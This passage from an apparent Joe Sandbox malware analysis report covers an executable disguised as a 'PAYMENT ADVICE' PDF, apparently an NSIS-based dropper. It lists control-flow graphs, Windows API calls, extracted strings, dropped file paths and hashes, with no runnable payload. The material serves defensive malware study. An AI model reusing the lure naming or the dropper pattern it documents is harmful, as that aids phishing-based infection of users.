                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 2295610775-0
                                                                                                                • Opcode ID: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                                • Instruction ID: 3b49439eae3a82ac9864466e1d27f896d1b9bc200308884f11696e1f8cd425af
                                                                                                                • Opcode Fuzzy Hash: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                                • Instruction Fuzzy Hash: 3AD012755081209BC28117386E0C84B7A5C9F193317115B36FE6BF22E0CB388C6786DC
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFindFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 1974802433-0
                                                                                                                • Opcode ID: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                                • Instruction ID: 801a3ec73fa0f8c7b921e95059ce856047ace0635644dd2743fa1cdad283ab42
                                                                                                                • Opcode Fuzzy Hash: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                                • Instruction Fuzzy Hash: C5F08C71A005149BCB01EFA4DE49AAEB378FF04324F2045BBF105F31E1E7B89A409B29

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 257 403c41-403c53 258 403d94-403da3 257->258 259 403c59-403c5f 257->259 261 403df2-403e07 258->261 262 403da5-403ded GetDlgItem * 2 call 404119 SetClassLongW call 40140b 258->262 259->258 260 403c65-403c6e 259->260 265 403c70-403c7d SetWindowPos 260->265 266 403c83-403c86 260->266 263 403e47-403e4c call 404165 261->263 264 403e09-403e0c 261->264 262->261 276 403e51-403e6c 263->276 268 403e0e-403e19 call 401389 264->268 269 403e3f-403e41 264->269 265->266 271 403ca0-403ca6 266->271 272 403c88-403c9a ShowWindow 266->272 268->269 290 403e1b-403e3a SendMessageW 268->290 269->263 275 4040e6 269->275 277 403cc2-403cc5 271->277 278 403ca8-403cbd DestroyWindow 271->278 272->271 283 4040e8-4040ef 275->283 281 403e75-403e7b 276->281 282 403e6e-403e70 call 40140b 276->282 286 403cc7-403cd3 SetWindowLongW 277->286 287 403cd8-403cde 277->287 284 4040c3-4040c9 278->284 293 403e81-403e8c 281->293 294 4040a4-4040bd DestroyWindow EndDialog 281->294 282->281 284->275 291 4040cb-4040d1 284->291 286->283 288 403d81-403d8f call 404180 287->288 289 403ce4-403cf5 GetDlgItem 287->289 288->283 295 403d14-403d17 289->295 296 403cf7-403d0e SendMessageW IsWindowEnabled 289->296 290->283 291->275 298 4040d3-4040dc ShowWindow 291->298 293->294 299 403e92-403edf call 406077 call 404119 * 3 GetDlgItem 293->299 294->284 300 403d19-403d1a 295->300 301 403d1c-403d1f 295->301 296->275 296->295 298->275 327 403ee1-403ee6 299->327 328 403ee9-403f25 ShowWindow KiUserCallbackDispatcher call 40413b EnableWindow 299->328 304 403d4a-403d4f call 4040f2 300->304 305 403d21-403d27 301->305 306 403d2d-403d32 301->306 304->288 309 403d68-403d7b SendMessageW 305->309 310 403d29-403d2b 305->310 306->309 311 403d34-403d3a 306->311 309->288 310->304 315 403d51-403d5a call 40140b 311->315 316 403d3c-403d42 call 40140b 311->316 315->288 324 403d5c-403d66 315->324 325 403d48 316->325 324->325 325->304 327->328 331 403f27-403f28 328->331 332 403f2a 328->332 333 403f2c-403f5a GetSystemMenu EnableMenuItem SendMessageW 331->333 332->333 334 403f5c-403f6d SendMessageW 333->334 335 403f6f 333->335 336 403f75-403fb3 call 40414e call 406055 lstrlenW call 406077 SetWindowTextW call 401389 334->336 335->336 336->276 345 403fb9-403fbb 336->345 345->276 346 403fc1-403fc5 345->346 347 403fe4-403ff8 DestroyWindow 346->347 348 403fc7-403fcd 346->348 347->284 350 403ffe-40402b CreateDialogParamW 347->350 348->275 349 403fd3-403fd9 348->349 349->276 351 403fdf 349->351 350->284 352 404031-404088 call 404119 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 350->352 351->275 352->275 357 40408a-4040a2 ShowWindow call 404165 352->357 357->284
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                                • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                                • DestroyWindow.USER32 ref: 00403CAE
                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F02
                                                                                                                • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                                • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                                • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3282139019-0
                                                                                                                • Opcode ID: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                                • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                                • Opcode Fuzzy Hash: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                                • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 360 40389e-4038b6 call 40642b 363 4038b8-4038c3 GetUserDefaultUILanguage call 405f9c 360->363 364 4038ca-403901 call 405f22 360->364 367 4038c8 363->367 370 403903-403914 call 405f22 364->370 371 403919-40391f lstrcatW 364->371 369 403924-40394d call 403b74 call 405b11 367->369 377 403953-403958 369->377 378 4039df-4039e7 call 405b11 369->378 370->371 371->369 377->378 379 40395e-403986 call 405f22 377->379 384 4039f5-403a1a LoadImageW 378->384 385 4039e9-4039f0 call 406077 378->385 379->378 386 403988-40398c 379->386 388 403a9b-403aa3 call 40140b 384->388 389 403a1c-403a4c RegisterClassW 384->389 385->384 390 40399e-4039aa lstrlenW 386->390 391 40398e-40399b call 405a36 386->391 402 403aa5-403aa8 388->402 403 403aad-403ab8 call 403b74 388->403 392 403a52-403a96 SystemParametersInfoW CreateWindowExW 389->392 393 403b6a 389->393 397 4039d2-4039da call 405a09 call 406055 390->397 398 4039ac-4039ba lstrcmpiW 390->398 391->390 392->388 396 403b6c-403b73 393->396 397->378 398->397 401 4039bc-4039c6 GetFileAttributesW 398->401 405 4039c8-4039ca 401->405 406 4039cc-4039cd call 405a55 401->406 402->396 412 403b41-403b49 call 405287 403->412 413 403abe-403ad8 ShowWindow call 4063bf 403->413 405->397 405->406 406->397 420 403b63-403b65 call 40140b 412->420 421 403b4b-403b51 412->421 418 403ae4-403af6 GetClassInfoW 413->418 419 403ada-403adf call 4063bf 413->419 425 403af8-403b08 GetClassInfoW RegisterClassW 418->425 426 403b0e-403b31 DialogBoxParamW call 40140b 418->426 419->418 420->393 421->402 422 403b57-403b5e call 40140b 421->422 422->402 425->426 430 403b36-403b3f call 4037ee 426->430 430->396
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                  • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                • GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe"), ref: 004038B8
                                                                                                                  • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                • lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe"), ref: 0040391F
                                                                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 0040399F
                                                                                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                                • GetFileAttributesW.KERNEL32(Call), ref: 004039BD
                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving), ref: 00403A06
                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                • String ID: "C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                • API String ID: 606308-632721827
                                                                                                                • Opcode ID: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                                • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                                • Opcode Fuzzy Hash: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                                • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 433 402dee-402e3c GetTickCount GetModuleFileNameW call 405c2a 436 402e48-402e76 call 406055 call 405a55 call 406055 GetFileSize 433->436 437 402e3e-402e43 433->437 445 402f63-402f71 call 402d8a 436->445 446 402e7c 436->446 438 403020-403024 437->438 452 402f73-402f76 445->452 453 402fc6-402fcb 445->453 448 402e81-402e98 446->448 450 402e9a 448->450 451 402e9c-402ea5 call 403242 448->451 450->451 458 402eab-402eb2 451->458 459 402fcd-402fd5 call 402d8a 451->459 456 402f78-402f90 call 403258 call 403242 452->456 457 402f9a-402fc4 GlobalAlloc call 403258 call 403027 452->457 453->438 456->453 480 402f92-402f98 456->480 457->453 484 402fd7-402fe8 457->484 462 402eb4-402ec8 call 405be5 458->462 463 402f2e-402f32 458->463 459->453 471 402f3c-402f42 462->471 482 402eca-402ed1 462->482 470 402f34-402f3b call 402d8a 463->470 463->471 470->471 475 402f51-402f5b 471->475 476 402f44-402f4e call 4064dc 471->476 475->448 483 402f61 475->483 476->475 480->453 480->457 482->471 486 402ed3-402eda 482->486 483->445 487 402ff0-402ff5 484->487 488 402fea 484->488 486->471 489 402edc-402ee3 486->489 490 402ff6-402ffc 487->490 488->487 489->471 491 402ee5-402eec 489->491 490->490 492 402ffe-403019 SetFilePointer call 405be5 490->492 491->471 494 402eee-402f0e 491->494 495 40301e 492->495 494->453 496 402f14-402f18 494->496 495->438 497 402f20-402f28 496->497 498 402f1a-402f1e 496->498 497->471 499 402f2a-402f2c 497->499 498->483 498->497 499->471
                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                                  • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                  • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe,C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                • String ID: "C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe"$(*B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                • API String ID: 4283519449-1606963547
                                                                                                                • Opcode ID: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                                • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                                • Opcode Fuzzy Hash: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                                • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 626 401767-40178c call 402bbf call 405a80 631 401796-4017a8 call 406055 call 405a09 lstrcatW 626->631 632 40178e-401794 call 406055 626->632 638 4017ad-4017ae call 4062e9 631->638 632->638 641 4017b3-4017b7 638->641 642 4017b9-4017c3 call 406398 641->642 643 4017ea-4017ed 641->643 650 4017d5-4017e7 642->650 651 4017c5-4017d3 CompareFileTime 642->651 645 4017f5-401811 call 405c2a 643->645 646 4017ef-4017f0 call 405c05 643->646 653 401813-401816 645->653 654 401885-4018ae call 4051b4 call 403027 645->654 646->645 650->643 651->650 655 401867-401871 call 4051b4 653->655 656 401818-401856 call 406055 * 2 call 406077 call 406055 call 40579a 653->656 668 4018b0-4018b4 654->668 669 4018b6-4018c2 SetFileTime 654->669 666 40187a-401880 655->666 656->641 689 40185c-40185d 656->689 670 402a55 666->670 668->669 672 4018c8-4018d3 CloseHandle 668->672 669->672 676 402a57-402a5b 670->676 674 4018d9-4018dc 672->674 675 402a4c-402a4f 672->675 678 4018f1-4018f4 call 406077 674->678 679 4018de-4018ef call 406077 lstrcatW 674->679 675->670 683 4018f9-40228d call 40579a 678->683 679->683 683->676 689->666 691 40185f-401860 689->691 691->655
                                                                                                                APIs
                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Beclamor,?,?,00000031), ref: 004017A8
                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Beclamor,?,?,00000031), ref: 004017CD
                                                                                                                  • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                  • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                                  • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Beclamor$C:\Users\user\AppData\Local\Temp\nsv30DA.tmp$C:\Users\user\AppData\Local\Temp\nsv30DA.tmp\System.dll$Call
                                                                                                                • API String ID: 1941528284-606127373
                                                                                                                • Opcode ID: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                                • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                                • Opcode Fuzzy Hash: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                                • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 692 403027-40303e 693 403040 692->693 694 403047-403050 692->694 693->694 695 403052 694->695 696 403059-40305e 694->696 695->696 697 403060-403069 call 403258 696->697 698 40306e-40307b call 403242 696->698 697->698 702 403230 698->702 703 403081-403085 698->703 704 403232-403233 702->704 705 4031db-4031dd 703->705 706 40308b-4030d4 GetTickCount 703->706 709 40323b-40323f 704->709 707 40321d-403220 705->707 708 4031df-4031e2 705->708 710 403238 706->710 711 4030da-4030e2 706->711 712 403222 707->712 713 403225-40322e call 403242 707->713 708->710 714 4031e4 708->714 710->709 715 4030e4 711->715 716 4030e7-4030f5 call 403242 711->716 712->713 713->702 725 403235 713->725 718 4031e7-4031ed 714->718 715->716 716->702 724 4030fb-403104 716->724 721 4031f1-4031ff call 403242 718->721 722 4031ef 718->722 721->702 730 403201-40320d call 405cdc 721->730 722->721 727 40310a-40312a call 40654a 724->727 725->710 734 403130-403143 GetTickCount 727->734 735 4031d3-4031d5 727->735 736 4031d7-4031d9 730->736 737 40320f-403219 730->737 738 403145-40314d 734->738 739 40318e-403190 734->739 735->704 736->704 737->718 740 40321b 737->740 741 403155-40318b MulDiv wsprintfW call 4051b4 738->741 742 40314f-403153 738->742 743 403192-403196 739->743 744 4031c7-4031cb 739->744 740->710 741->739 742->739 742->741 747 403198-40319f call 405cdc 743->747 748 4031ad-4031b8 743->748 744->711 745 4031d1 744->745 745->710 753 4031a4-4031a6 747->753 749 4031bb-4031bf 748->749 749->727 752 4031c5 749->752 752->710 753->736 754 4031a8-4031ab 753->754 754->749
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
